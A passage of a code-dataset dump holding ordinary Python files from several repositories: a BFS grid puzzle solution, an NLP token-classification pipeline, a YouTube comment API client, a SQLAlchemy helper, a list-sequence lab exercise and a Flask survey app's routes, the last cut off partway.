_main(args)\n","repo_name":"ahedayat/FastAP","sub_path":"resnet_eval.py","file_name":"resnet_eval.py","file_ext":"py","file_size_in_byte":6796,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"72807813065","text":"import math\nfrom collections import deque\n\ndef init_rectangle(graph, rectangle):\n for left_down_x, left_down_y, right_up_x, right_up_y in rectangle:\n for i in range(left_down_x, right_up_x + 1):\n graph[left_down_y][i] = 1\n graph[right_up_y][i] = 1\n for i in range(left_down_y, right_up_y + 1):\n graph[i][right_up_x] = 1\n graph[i][left_down_x] = 1\n\ndef check_in_rectangle(rectangle: list, x, y):\n # 하나라도 안에 들어갈 경우\n if any (left_down_x < x < right_up_x and left_down_y < y < right_up_y\n for left_down_x, left_down_y, right_up_x, right_up_y in rectangle):\n return False\n # 이용 가능\n return True\n\ndef check_rain_side(rectangle: list, before_x, before_y, after_x, after_y):\n\n if before_y == after_y:\n if before_x > after_x:\n before_x, after_x = after_x, before_x\n # 하나라도 안에 들어갈 경우\n if any (left_down_x <= before_x < after_x <= right_up_x and\n (before_y == left_down_y or before_y == right_up_y)\n for left_down_x, left_down_y, right_up_x, right_up_y in rectangle):\n return True\n if before_x == after_x:\n if before_y > after_y:\n before_y, after_y = after_y, before_y\n\n # 하나라도 안에 들어갈 경우\n if any(left_down_y <= before_y < after_y <= right_up_y and\n (before_x == left_down_x or before_x == right_up_x)\n for left_down_x, left_down_y, right_up_x, right_up_y in rectangle):\n return True\n # 이용 가능\n return False\n\ndef check_rain_side_final(rectangle: list, before_x, before_y, after_x, after_y):\n if before_y == after_y:\n if before_x > after_x:\n before_x, after_x = after_x, before_x\n # 하나라도 안에 들어갈 경우\n if any (left_down_y < before_y < right_up_y and before_x == left_down_x and\n after_x == right_up_x\n for left_down_x, left_down_y, right_up_x, right_up_y in rectangle):\n return False\n if before_x == after_x:\n if before_y > after_y:\n before_y, after_y = after_y, before_y\n # 하나라도 안에 들어갈 경우\n if any(left_down_x < before_x < right_up_x and before_y == left_down_y and\n after_y == right_up_y\n for left_down_x, left_down_y, right_up_x, right_up_y in rectangle):\n return False\n # 이용 가능\n return True\n\ndef direction(graph, x, y, q: deque, rectangle):\n nx = [0, 1, 0, -1]\n ny = [1, 0, -1, 0]\n for i in range(4):\n dx = nx[i] + x\n dy = ny[i] + y\n if -1 < dx < 102 and -1 < dy < 102 and graph[dy][dx] == 1 \\\n and check_in_rectangle(rectangle, dx, dy)\\\n and check_rain_side(rectangle, x, y, dx, dy)\\\n and check_rain_side_final(rectangle, x, y, dx, dy):\n graph[dy][dx] = graph[y][x] + 1\n q.append((dx, dy))\n\n\ndef bfs(graph, rectangle, q, itemX, itemY):\n\n while q:\n (x,y) = q.popleft()\n if x == itemX and y == itemY:\n return graph[y][x]\n direction(graph, x, y, q, rectangle)\n return -1\n\n\ndef solution(rectangle, characterX, characterY, itemX, itemY):\n graph = [[0]*102 for _ in range(102)]\n\n init_rectangle(graph, rectangle)\n q = deque()\n graph[characterY][characterX] = 0\n q.append((characterX, characterY))\n\n answer = bfs(graph, rectangle, q, itemX, itemY)\n # for i in range(10):\n # check = []\n # for j in range(10):\n # check.append(graph[i][j])\n # print(check)\n # # print(graph[itemY][itemX])\n return answer\n\n\ndef main():\n print(solution(\t[[2, 2, 5, 5], [1, 3, 6, 4], [3, 1, 4, 6]], 1, 4, 6, 3))\n\n\nif __name__ == \"__main__\":\n 
main()\n\n","repo_name":"fineman999/Algorithm","sub_path":"Programmers/Kit/DFS_BFS/pick_up_items.py","file_name":"pick_up_items.py","file_ext":"py","file_size_in_byte":3846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"14850706613","text":"from typing import Any, Dict, Union\n\nfrom torchmetrics.classification.accuracy import MulticlassAccuracy\nfrom torchmetrics.classification.f_beta import MulticlassF1Score\nfrom transformers.configuration_utils import PretrainedConfig\nfrom transformers.tokenization_utils_base import PreTrainedTokenizerBase\n\nfrom transformers_framework.architectures.modeling_outputs import TokenClassOutput\nfrom transformers_framework.interfaces.adaptation import token_classification_adaptation\nfrom transformers_framework.interfaces.logging import (\n LOSS,\n TOKEN_CLASS_ACCURACY,\n TOKEN_CLASS_F1,\n TOKEN_CLASS_LOSS,\n TOKEN_CLASS_PERPLEXITY,\n)\nfrom transformers_framework.interfaces.step import TokenClassStepOutput\nfrom transformers_framework.metrics.perplexity import Perplexity\nfrom transformers_framework.pipelines.pipeline import Pipeline\nfrom transformers_framework.processing.postprocessors import token_class_processor\nfrom transformers_framework.utilities import IGNORE_IDX\nfrom transformers_framework.utilities.arguments import FlexibleArgumentParser, add_token_class_arguments\n\n\nclass TokenClassPipeline(Pipeline):\n r\"\"\" A model that does token classification for NER or POS. \"\"\"\n\n POST_FORWARD_ADAPTER = token_classification_adaptation\n MODEL_INPUT_NAMES_TO_REDUCE = [\n ('input_ids', 'attention_mask', 'token_type_ids', 'token_class_labels')\n ]\n\n def __init__(self, hyperparameters):\n super().__init__(hyperparameters)\n\n metrics_kwargs = dict(average=None, ignore_index=IGNORE_IDX, num_classes=self.config.num_labels)\n ppl_kwargs = dict(ignore_index=IGNORE_IDX)\n\n # train metrics\n self.train_acc = MulticlassAccuracy(**metrics_kwargs)\n self.train_f1 = MulticlassF1Score(**metrics_kwargs)\n self.train_ppl = Perplexity(**ppl_kwargs)\n\n # validation metrics\n self.valid_acc = MulticlassAccuracy(**metrics_kwargs)\n self.valid_f1 = MulticlassF1Score(**metrics_kwargs)\n self.valid_ppl = Perplexity(**ppl_kwargs)\n\n # test metrics\n self.test_acc = MulticlassAccuracy(**metrics_kwargs)\n self.test_f1 = MulticlassF1Score(**metrics_kwargs)\n self.test_ppl = Perplexity(**ppl_kwargs)\n\n def setup_config(self, **kwargs) -> Union[PretrainedConfig, Dict[str, PretrainedConfig]]:\n kwargs['num_labels'] = self.hyperparameters.num_labels\n return super().setup_config(**kwargs)\n\n def setup_tokenizer(self) -> PreTrainedTokenizerBase:\n return super().setup_tokenizer(add_prefix_space=True)\n\n def step(self, batch: Dict) -> TokenClassStepOutput:\n r\"\"\" Forward step is shared between all train/val/test steps. 
\"\"\"\n results: TokenClassOutput = self.forward(**batch)\n\n return TokenClassStepOutput(\n loss=results.token_class_loss,\n token_class_loss=results.token_class_loss,\n token_class_predictions=results.token_class_logits.argmax(dim=-1),\n token_class_logits=results.token_class_logits,\n token_class_labels=batch['token_class_labels'],\n )\n\n def training_step(self, batch, *args):\n r\"\"\" Here you compute and return the training loss and some additional metrics for e.g.\n the progress bar or logger.\n \"\"\"\n step_output = self.step(batch)\n\n acc = self.train_acc(step_output.token_class_predictions, step_output.token_class_labels)\n f1 = self.train_f1(step_output.token_class_predictions, step_output.token_class_labels)\n ppl = self.train_ppl(step_output.token_class_logits.float(), step_output.token_class_labels)\n\n self.log(LOSS, step_output.loss)\n self.log(TOKEN_CLASS_LOSS, step_output.token_class_loss)\n self.log(TOKEN_CLASS_ACCURACY, acc)\n self.log(TOKEN_CLASS_PERPLEXITY, ppl)\n self.log(TOKEN_CLASS_F1, f1)\n\n return step_output.loss\n\n def validation_step(self, batch, *args):\n r\"\"\" Operates on a single batch of data from the validation set.\n In this step you'd might generate examples or calculate anything of interest like accuracy.\n \"\"\"\n step_output = self.step(batch)\n\n valid_acc = self.valid_acc(\n step_output.token_class_predictions, step_output.token_class_labels\n )\n valid_f1 = self.valid_f1(step_output.token_class_predictions, step_output.token_class_labels)\n valid_ppl = self.valid_ppl(step_output.token_class_logits.float(), step_output.token_class_labels)\n\n self.log(LOSS, step_output.loss)\n self.log(TOKEN_CLASS_LOSS, step_output.token_class_loss)\n self.log(TOKEN_CLASS_ACCURACY, valid_acc)\n self.log(TOKEN_CLASS_F1, valid_f1)\n self.log(TOKEN_CLASS_PERPLEXITY, valid_ppl)\n\n def test_step(self, batch, *args):\n r\"\"\"\n Operates on a single batch of data from the test set.\n In this step you'd normally generate examples or calculate anything of interest such as accuracy.\n \"\"\"\n step_output = self.step(batch)\n \n test_acc = self.test_acc(step_output.token_class_predictions, step_output.token_class_labels)\n test_f1 = self.test_f1(step_output.token_class_predictions, step_output.token_class_labels)\n test_ppl = self.test_ppl(step_output.token_class_logits.float(), step_output.token_class_labels)\n\n self.log(LOSS, step_output.loss)\n self.log(TOKEN_CLASS_LOSS, step_output.token_class_loss)\n self.log(TOKEN_CLASS_ACCURACY, test_acc)\n self.log(TOKEN_CLASS_F1, test_f1)\n self.log(TOKEN_CLASS_PERPLEXITY, test_ppl)\n\n def postprocess(self, sample: Dict[str, Any]) -> Dict[str, Any]:\n r\"\"\" Process single samples to add denoising objective. 
\"\"\"\n return token_class_processor(\n sample=sample,\n input_column=self.hyperparameters.input_column,\n label_column=self.hyperparameters.label_column,\n tokenizer=self.tokenizer,\n max_sequence_length=self.hyperparameters.max_sequence_length,\n )\n\n @classmethod\n def add_argparse_args(cls, parser: FlexibleArgumentParser):\n super().add_argparse_args(parser)\n parser.add_argument('--input_column', type=str, required=True)\n parser.add_argument('--label_column', type=str, required=True)\n add_token_class_arguments(parser)\n","repo_name":"lucadiliello/transformers-framework","sub_path":"transformers_framework/pipelines/token_class/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":6303,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"16795272724","text":"from __future__ import annotations\n\nfrom datetime import datetime, timezone, timedelta\nimport json\nfrom typing import Optional\nfrom googleapiclient.discovery import build as get_youtube_api\nfrom googleapiclient.errors import HttpError\nfrom structlog import get_logger\n\nfrom config import (\n youtube_api_version,\n youtube_api_service_name,\n rob_miles_youtube_channel_id,\n youtube_api_key,\n)\nfrom utilities import Utilities\n\nlog = get_logger()\nutils = Utilities.get_instance()\n\nclass YoutubeAPI:\n \"\"\"Youtube API\"\"\"\n __instance: Optional[YoutubeAPI] = None\n YOUTUBE_API_KEY = youtube_api_key\n \n @staticmethod\n def get_instance() -> YoutubeAPI:\n if YoutubeAPI.__instance is None:\n return YoutubeAPI()\n return YoutubeAPI.__instance\n \n def __init__(self) -> None:\n if YoutubeAPI.__instance is not None:\n raise Exception(\n \"This class is a singleton! Access it using `Utilities.get_instance()`\"\n )\n YoutubeAPI.__instance = self\n self.class_name = self.__class__.__name__\n \n # dict to keep last timestamps in\n self.last_timestamp: dict[str, datetime] = {}\n\n # when was the most recent comment we saw posted?\n self.latest_comment_timestamp = datetime.now(timezone.utc)\n\n # when did we last hit the API to check for comments?\n self.last_check_timestamp = datetime.now(timezone.utc)\n\n # how many seconds should we wait before we can hit YT API again\n # this the start value. It doubles every time we don't find anything new\n self.youtube_cooldown = timedelta(seconds=60)\n\n # timestamp of last time we asked a youtube question\n self.last_question_asked_timestamp = datetime.now(timezone.utc)\n\n # Was the last message posted in #general by anyone, us asking a question from YouTube?\n # We start off not knowing, but it's better to assume yes than no\n self.last_message_was_youtube_question = True\n\n try:\n self.youtube = get_youtube_api(\n youtube_api_service_name,\n youtube_api_version,\n developerKey=self.YOUTUBE_API_KEY,\n )\n except HttpError:\n if self.YOUTUBE_API_KEY:\n log.info(self.class_name, msg=\"YouTube API Key is set but not correct\")\n else:\n log.info(self.class_name, msg=\"YouTube API Key is not set\")\n\n def rate_limit(self, timer_name: str, **kwargs) -> bool:\n \"\"\"Should I rate-limit? i.e. 
Has it been less than this length of time since the last time\n this function was called using the same `timer_name`?\n Used in a function like Module.tick() to make sure it doesn't run too often.\n For example, adding this at the top of a function that checks the youtube API:\n\n if utils.rate_limit(\"check youtube API\", seconds=30):\n return\n\n will cause the function to return early if it's been less than 30 seconds since it was last called.\n The keyword arguments are passed on to the timedelta object,\n so you can use 'seconds=', 'minutes=', 'hours=' etc, or combinations of them\n Note that this is all reset when Stampy reboots\n \"\"\"\n tick_cooldown = timedelta(**kwargs)\n now = datetime.now(timezone.utc)\n\n # if there's no timestamp stored for that name, store now and don't rate limit\n if timer_name not in self.last_timestamp:\n self.last_timestamp[timer_name] = now\n return False\n\n # if it's been long enough, update the timestamp and don't rate limit\n if (now - self.last_timestamp[timer_name]) > tick_cooldown:\n self.last_timestamp[timer_name] = now\n return False\n # it hasn't been long enough, rate limit\n return True\n\n\n def get_youtube_comment_replies(self, comment_url: str) -> list[dict]:\n url_arr = comment_url.split(\"&lc=\")\n reply_id = url_arr[-1].split(\".\")[0]\n request = self.youtube.comments().list(part=\"snippet\", parentId=reply_id)\n try:\n response = request.execute()\n except HttpError as err:\n if err.resp.get(\"content-type\", \"\").startswith(\"application/json\"):\n message = (\n json.loads(err.content).get(\"error\").get(\"errors\")[0].get(\"message\")\n )\n if message:\n log.error(self.class_name, error=message)\n return []\n log.error(self.class_name, error=\"Unknown Google API Error\")\n return []\n items: list[dict] = response.get(\"items\", [])\n replies = [self.parse_reply(item) for item in items]\n return replies\n \n @staticmethod\n def parse_reply(item: dict) -> dict:\n reply_id = item[\"id\"]\n username = item[\"snippet\"][\"authorDisplayName\"]\n text = item[\"snippet\"][\"textOriginal\"]\n timestamp = item[\"snippet\"][\"publishedAt\"][:-1]\n likes = item[\"snippet\"][\"likeCount\"]\n reply = {\n \"username\": username,\n \"reply\": reply_id,\n \"text\": text,\n \"title\": \"\",\n \"timestamp\": timestamp,\n \"likes\": likes,\n }\n return reply\n \n\n def get_youtube_comment(self, comment_url):\n url_arr = comment_url.split(\"&lc=\")\n video_url = url_arr[0]\n reply_id = url_arr[-1].split(\".\")[0]\n request = self.youtube.commentThreads().list(part=\"snippet\", id=reply_id)\n try:\n response = request.execute()\n except HttpError as err:\n if err.resp.get(\"content-type\", \"\").startswith(\"application/json\"):\n message = (\n json.loads(err.content).get(\"error\").get(\"errors\")[0].get(\"message\")\n )\n if message:\n log.error(self.class_name, error=message)\n return\n log.error(self.class_name, error=\"Unknown Google API Error\")\n return\n items = response.get(\"items\")\n comment = {\"video_url\": video_url}\n if items:\n top_level_comment = items[0][\"snippet\"][\"topLevelComment\"]\n comment[\"timestamp\"] = top_level_comment[\"snippet\"][\"publishedAt\"][:-1]\n comment[\"comment_id\"] = top_level_comment[\"id\"]\n comment[\"username\"] = top_level_comment[\"snippet\"][\"authorDisplayName\"]\n comment[\"likes\"] = top_level_comment[\"snippet\"][\"likeCount\"]\n comment[\"text\"] = top_level_comment[\"snippet\"][\"textOriginal\"]\n comment[\"reply_count\"] = items[0][\"snippet\"][\"totalReplyCount\"]\n else: # This happens if 
the comment was deleted from YT\n comment[\"timestamp\"] = datetime.isoformat(datetime.utcnow())\n comment[\"comment_id\"] = reply_id\n comment[\"username\"] = \"Unknown\"\n comment[\"likes\"] = 0\n comment[\"text\"] = \"\"\n comment[\"reply_count\"] = 0\n return comment\n\n def check_for_new_youtube_comments(self) -> Optional[list[dict]]:\n \"\"\"Consider getting the latest comments from the channel\n Returns a list of dicts if there are new comments\n Returns [] if it checked and there are no new ones\n Returns None if it didn't check because it's too soon to check again\"\"\"\n\n now = datetime.now(timezone.utc)\n\n if (now - self.last_check_timestamp) > self.youtube_cooldown:\n log.info(self.class_name, msg=\"Hitting YT API\")\n self.last_check_timestamp = now\n else:\n log.info(\n self.class_name,\n msg=f\"YT waiting >{self.youtube_cooldown - (now - self.last_check_timestamp)}\\t- \"\n )\n return None\n\n if self.youtube is None:\n log.info(\n f\"{self.class_name}: YouTube\",\n msg=\"WARNING: YouTube API Key is invalid or not set\",\n )\n self.youtube_cooldown = self.youtube_cooldown * 10\n return []\n\n request = self.youtube.commentThreads().list(\n part=\"snippet\", allThreadsRelatedToChannelId=rob_miles_youtube_channel_id\n )\n try:\n response = request.execute()\n except HttpError as err:\n if err.resp.get(\"content-type\", \"\").startswith(\"application/json\"):\n message = (\n json.loads(err.content).get(\"error\").get(\"errors\")[0].get(\"message\")\n )\n if message:\n log.error(self.class_name, error=message)\n return\n log.error(self.class_name, error=\"Unknown Google API Error\")\n return\n\n items = response.get(\"items\", None)\n if not items:\n # something broke, slow way down\n log.info(\n self.class_name,\n msg=\"YT comment checking broke. 
I got this response:\",\n )\n log.info(self.class_name, response=response)\n self.youtube_cooldown = self.youtube_cooldown * 10\n return None\n\n newest_timestamp = self.latest_comment_timestamp\n\n new_items = []\n for item in items:\n # Find when the comment was published\n timestamp = item[\"snippet\"][\"topLevelComment\"][\"snippet\"][\"publishedAt\"]\n # For some reason fromisoformat() doesn't like the trailing 'Z' on timestmaps\n # And we add the \"+00:00\" so it knows to use UTC\n published_timestamp = datetime.fromisoformat(timestamp[:-1] + \"+00:00\")\n\n # If this comment is newer than the newest one from last time we called API, keep it\n if published_timestamp > self.latest_comment_timestamp:\n new_items.append(item)\n\n # Keep track of which is the newest in this API call\n if published_timestamp > newest_timestamp:\n newest_timestamp = published_timestamp\n\n log.info(\n self.class_name,\n msg=f\"Got {len(items)} items, most recent published at {newest_timestamp}\"\n )\n\n # save the timestamp of the newest comment we found, so next API call knows what's fresh\n self.latest_comment_timestamp = newest_timestamp\n\n new_comments = [self.parse_comment(item) for item in new_items]\n \n log.info(\n self.class_name,\n msg=f\"Got {len(new_comments)} new comments since last check\",\n )\n\n if not new_comments:\n # we got nothing, double the cooldown period (but not more than 20 minutes)\n self.youtube_cooldown = min(\n self.youtube_cooldown * 2, timedelta(seconds=1200)\n )\n log.info(\n self.class_name,\n msg=f\"No new comments, increasing cooldown timer to {self.youtube_cooldown}\"\n )\n\n return new_comments\n \n \n \n @staticmethod\n def parse_comment(item: dict) -> dict:\n top_level_comment = item[\"snippet\"][\"topLevelComment\"]\n video_id = top_level_comment[\"snippet\"][\"videoId\"]\n comment_id = top_level_comment[\"id\"]\n username = top_level_comment[\"snippet\"][\"authorDisplayName\"]\n text = top_level_comment[\"snippet\"][\"textOriginal\"]\n timestamp = top_level_comment[\"snippet\"][\"publishedAt\"][:-1]\n likes = top_level_comment[\"snippet\"][\"likeCount\"]\n reply_count = item[\"snippet\"][\"totalReplyCount\"]\n comment = {\n \"url\": f\"https://www.youtube.com/watch?v={video_id}&lc={comment_id}\",\n \"username\": username,\n \"text\": text,\n \"title\": \"\",\n \"timestamp\": timestamp,\n \"likes\": likes,\n \"reply_count\": reply_count,\n }\n return comment\n\n \n\n def add_youtube_question(self, comment: dict):\n \"\"\"Get the video title from the video URL, without the comment id\n \"\"\"\n # TODO: do we need to actually parse the URL param properly? 
Order is hard-coded from get yt comment\n video_titles = utils.get_title(comment[\"url\"].split(\"&lc=\")[0])\n\n if not video_titles:\n # this should actually only happen in dev\n video_titles = [\"Video Title Unknown\", \"Video Title Unknown\"]\n\n display_title = f\"{comment['username']}'s question on {video_titles[0]}\"\n\n # TODO: add to Coda\n","repo_name":"StampyAI/stampy","sub_path":"api/youtube.py","file_name":"youtube.py","file_ext":"py","file_size_in_byte":12398,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"81"} +{"seq_id":"29945337731","text":"from skyviz.utils import logger\nfrom database.models import Base\n\nfrom sqlalchemy import Engine, select\nfrom sqlalchemy.orm import Mapped\n\nfrom datetime import datetime, timedelta\n\nlog = logger.create(__name__)\n'''\nSee the docs for writing SQL statements with SQLAlchemy 2.0 here:\nhttps://docs.sqlalchemy.org/en/20/orm/queryguide/index.html\n\nUnit of work pattern: https://docs.sqlalchemy.org/en/20/tutorial/orm_data_manipulation.html\n'''\n\n\nclass BaseRepository():\n '''\n Base class for database interfaces.\n '''\n def __init__(self, engine: Engine):\n self.engine = engine\n\n def calc_minutes_since_last_update(self, session, date_column: Mapped) -> float:\n '''\n Fetches the latest row in a table using the date_column,\n then calculates the time in minutes between the latest date and now.\n '''\n log.info(f'fetching most recent date in {date_column}')\n sql_query = select(date_column).order_by(date_column.desc()).limit(1)\n latest_date: datetime = session.execute(sql_query).scalar_one_or_none()\n log.info(f'{date_column} last updated: {latest_date}')\n time_since_last_update: timedelta = datetime.utcnow() - latest_date\n minutes_since_last_update: float = round(time_since_last_update.total_seconds() / 60, 1)\n log.info(f'calculated {minutes_since_last_update} minutes since last update')\n return minutes_since_last_update\n \n def count_total_rows(self, session, table_model: Base) -> int:\n '''\n Counts the number of rows in a table.\n '''\n log.info(f'counting rows in {table_model.__tablename__} table')\n count_result: int = session.query(table_model).count()\n log.info(f'counted {count_result} rows')\n return count_result\n\n def count_distinct(self, session, column: Mapped) -> int: # deprecated due to slow performance\n '''\n Counts the number of distinct values in a single column.\n '''\n log.info(f'counting distinct rows using table.column: {column}')\n count_result: int = session.query(column).distinct().count()\n log.info(f'counted {count_result} rows')\n return count_result\n","repo_name":"FPVian/sky-viz","sub_path":"src/skyviz/db/base_repo.py","file_name":"base_repo.py","file_ext":"py","file_size_in_byte":2189,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"36916553344","text":"import sys\nfrom math import sqrt\n\ndef read_list(list_n):\n n = int(input(\"Introduce the number of the elements: \"))\n print(\"The numbers are: \")\n for i in range(0, n):\n x = int(input())\n list_n.append(x)\n return list_n\n\ndef print_funct(list_n, start_poz, end_poz):\n if start_poz == 0 and end_poz == len(list_n) :\n print (\"The elements of the list are: \")\n else :\n print(\"This is the longest sequence which has the given property : \")\n for i in range (start_poz, end_poz):\n print(list_n[i])\n\ndef is_prime(n):\n \"\"\"Checks if an integer number n is prime.\n n - integer\n The function returns True if the number is 
prime\n and it returns False otherwise.\"\"\"\n \n if n == 2:\n return True\n if n < 2 or n % 2 == 0:\n return False\n for i in range(3, int(sqrt(n)) + 1, 2):\n if n % i == 0:\n return False\n return True\n\ndef long_prime(list_n):\n\n maxim = 0\n start_poz = -1\n end_poz = -1\n for i in range (len(list_n)-1):\n if is_prime(list_n[i]) == 1: \n l = 1 \n ok = 1\n stop = i + 1\n for j in range (i+1,len(list_n)-1): \n if ok == 1:\n if is_prime(list_n[j]) == 1:\n l += 1\n stop = j + 1\n else:\n ok = 0\n if maxim < l :\n maxim = l\n start_poz = i\n end_poz = stop\n if start_poz != -1 :\n print_funct(list_n, start_poz, end_poz + 1)\n else :\n print(\"There is not such a sequence!\")\n\ndef strict_incr(list_n):\n maxim = 0\n start_poz = -1\n end_poz= -1\n last_elem = 0\n for i in range (len(list_n)-1):\n l = 1\n ok = 1\n stop = i + 1\n last_elem = list_n[i]\n for j in range (i+1,len(list_n)):\n if ok == 1 :\n if last_elem < list_n[j] :\n l += 1\n last_elem = list_n[j]\n stop = j + 1\n else :\n ok = 0\n if maxim < l :\n maxim = l\n start_poz = i\n end_poz = stop\n print_funct(list_n, start_poz, end_poz)\n\n\ndef in_range(list_n):\n \"\"\"This function checks which numbers are in [0, 10] and prints out the\n longest sequence which satisfies this property.\"\"\"\n maxim = 0\n length = 0\n for i in range(0, len(list_n)):\n if list_n[i] > 0 and list_n[i] < 10:\n length +=1\n else:\n length = 0\n if length > maxim:\n maxim = length\n begin = i - length + 1\n \"\"\"for i in range(maxim):\n print(elements[i + begin])\"\"\"\n print_funct(list_n, begin, begin + maxim)\n\ndef single_nb(list_n):\n maxim = 0\n start_poz = -1\n end_poz = -1\n for i in range (len(list_n)-1):\n l = 1\n element = list_n[i]\n ok = 1\n stop = i + 1\n for j in range (i+1,len(list_n)):\n if ok == 1 :\n if list_n[j] == element :\n l+=1\n last_elem = list_n[j]\n stop = j + 1\n else:\n ok = 0\n if maxim < l :\n maxim = l\n start_poz = i\n end_poz = stop\n \n return list_n, start_poz, end_poz\n\ndef exit_funct(list_n):\n sys.exit()\n\ndef menu_options():\n print(\"0. Exit\")\n print(\"1. Help\")\n print(\"2. Read the list\")\n print(\"3. Print the list\")\n print(\"4. Print the longest sequence which contains only prime numbers\")\n print(\"5. Print the longest sequence which contains only increasing numbers\")\n print(\"6. Print the longest sequence which contains only numbers in range [0, 10]\")\n print(\"7. Print the longest sequence which contains only one number.\")\n\ndef main():\n print(\"\\n\\t Welcome to my app! 
For more information press 1!\")\n list_n = [1, 2, 4,2, 5, 6, 7, 1, 2,3, 4, 5]\n while True:\n opt = int(input(\"Input an option: \"))\n if opt == 1:\n menu_options()\n if opt == 2:\n read_list(list_n)\n if opt == 3:\n print_funct(list_n, 0, len(list_n))\n if opt == 4:\n long_prime(list_n)\n if opt == 5:\n strict_incr(list_n)\n if opt == 6:\n in_range(list_n)\n if opt == 7:\n a, b, c = single_nb(list_n)\n print_funct(a, b, c)\n if opt == 0:\n exit_funct(list_n)\n \n \nmain()\n","repo_name":"TeoMoisi/python-projects","sub_path":"lab2/lab2.py","file_name":"lab2.py","file_ext":"py","file_size_in_byte":4564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18134042691","text":"\"\"\"Rutas de la aplicacion\"\"\"\nfrom flask_login import LoginManager, login_user, logout_user, login_required, current_user\nfrom .consultas import *\nfrom .estructuraInterfaz import *\nfrom .modeluser import *\nfrom .decorators import *\nimport json\n\nfrom flask import current_app as app\nfrom flask import make_response, redirect, render_template, request\nfrom flask import Flask, request, jsonify\n\n\nfrom .models import *\nfrom .mail import *\n\nlogin_manager_app = LoginManager(app)\n\n\n@login_manager_app.user_loader\ndef load_user(id):\n return ModelUser.get_by_id(id)\n\n\n@app.route(\"/\")\ndef index():\n return render_template(\"login.html\")\n\n@app.route(\"/error\")\ndef error():\n return render_template(\"404error.html\")\n\n@app.route(\"/login\", methods=['GET', 'POST'])\ndef login():\n if request.method == 'POST':\n user = User(0, request.form['email'],\n request.form['password'], \"\", \"indefinido\", \"null\")\n logged_user = ModelUser.login(user)\n if logged_user != None:\n if logged_user.password:\n login_user(logged_user)\n if logged_user.rol == \"admin\":\n return redirect(url_for(\"dashboard_admin\"))\n else:\n return redirect(url_for(\"dashboard_user\"))\n else:\n return render_template(\"login.html\")\n else:\n return render_template(\"login.html\")\n else:\n return render_template(\"login.html\")\n\n\n@app.route(\"/logout\")\ndef logout():\n logout_user()\n return redirect(url_for(\"login\"))\n\n\n@app.route(\"/register\")\ndef register():\n return render_template(\"register.html\")\n\n\n@app.route(\"/register_user\", methods=['POST'])\ndef register_user():\n\n dataRegister = {\n \"email\": request.form['email'],\n \"password\": request.form['password'],\n \"name\": request.form['name'],\n \"apellido\": request.form['surname'],\n \"rut\": request.form['rut'],\n \"genero\": request.form.get(\"gender\"),\n \"fecha_nacimiento\": request.form['date']\n }\n\n return registrar_encuestado(dataRegister)\n\n\n@app.route(\"/ir_a_crear_nueva_encuesta\", methods=['GET'])\n@login_required\n@admin_required\ndef crea_nueva_encuesta():\n if db.session.query(Encuesta).order_by(Encuesta.id_encuesta.desc()).first() == None:\n return redirect(\"/survey/1/preguntas\")\n else:\n id_ultima_encuesta = db.session.query(Encuesta).order_by(\n Encuesta.id_encuesta.desc()).first().id_encuesta\n id_nueva = id_ultima_encuesta + 1\n return redirect(\"/survey/\"+str(id_nueva)+\"/preguntas\")\n\n\n@app.route(\"/ir_a_ultima_encuesta\", methods=['GET'])\n@login_required\n@admin_required\ndef ir_a_ultima_encuesta():\n if db.session.query(Encuesta).order_by(Encuesta.id_encuesta.desc()).first() == None:\n return redirect(\"/survey/1/preguntas\")\n else:\n id_ultima_encuesta = db.session.query(Encuesta).order_by(\n Encuesta.id_encuesta.desc()).first().id_encuesta\n return 
redirect(\"/survey/\"+str(id_ultima_encuesta)+\"/preguntas\")\n\n\n@app.route(\"/create_survey\", methods=['POST'])\n@login_required\n@admin_required\ndef create_survey():\n if request.method == 'POST':\n surveyData = request.get_json()\n return jsonify(guardar_encuesta(surveyData, current_user.id))\n\n\n@app.route(\"/modify_survey\", methods=['POST'])\n@login_required\n@admin_required\ndef modify_survey():\n if request.method == 'POST':\n surveyData = request.get_json()\n return jsonify(modificar_encuesta(surveyData))\n\n\n@app.route(\"/delete_survey\", methods=['POST'])\n@login_required\n@admin_required\ndef delete_survey():\n if request.method == 'POST':\n response = request.get_json()\n return jsonify(eliminar_encuesta(response[\"id_survey\"]))\n\n\n@app.route(\"/state_user\", methods=['POST'])\n@login_required\ndef state_user():\n if request.method == 'POST':\n response = json.loads(request.form.get(\"response\"))\n cambiar_estado_invitado(response)\n return response\n\n\n@app.route(\"/responder_encuesta\", methods=['POST'])\ndef responder_encuesta():\n if request.method == 'POST':\n responses = json.loads(request.form.get(\"responses\"))\n return guardar_respuesta(responses)\n return redirect(\"/\")\n\n\n@app.route(\"/agregar_usuario\", methods=['POST'])\ndef agregar_usuario():\n if request.method == 'POST':\n responses = json.loads(request.form.get(\"response\"))\n agregar_invitado(responses)\n return responses\n return redirect(\"/\")\n\n\n@app.route(\"/cambiar_estado_survey\", methods=['POST'])\ndef cambiar_estado_survey():\n if request.method == 'POST':\n responses = json.loads(request.form.get(\"response\"))\n cambiar_estado_encuesta(responses)\n return responses\n\n\n@app.route(\"/cambiar_configuracion_survey\", methods=['POST'])\ndef cambiar_configuracion_survey():\n if request.method == 'POST':\n responses = json.loads(request.form.get(\"surveyConfig\"))\n first_response = modificar_tiempo_limite(responses)\n secondary_response = asignar_asunto_y_mensaje(responses)\n return first_response + \" \" + secondary_response\n\n\n@app.route(\"/survey/\")\n@app.route(\"/survey//\")\n@app.route(\"/survey//\")\n@login_required\n@admin_required\ndef Survey(id_encuesta, section=\"preguntas\"):\n\n if section == \"preguntas\":\n if db.session.query(Encuesta).filter_by(id_encuesta=id_encuesta).first() == None:\n dataSurvey = {\n \"id\": id_encuesta,\n \"title\": \"\",\n \"description\": \"\",\n \"questions\": [],\n \"asigned\" : 0\n }\n return render_template(\"admin/survey.html\", data={\n\n \"url\": \"survey\",\n \"options\": [\"Preguntas\", \"Respuestas\", \"Usuarios\", \"Configuración\"],\n \"selected\": section,\n \"id\": id_encuesta,\n \"dataSurvey\": dataSurvey,\n \"textButton\": \"Guardar\"\n }\n )\n 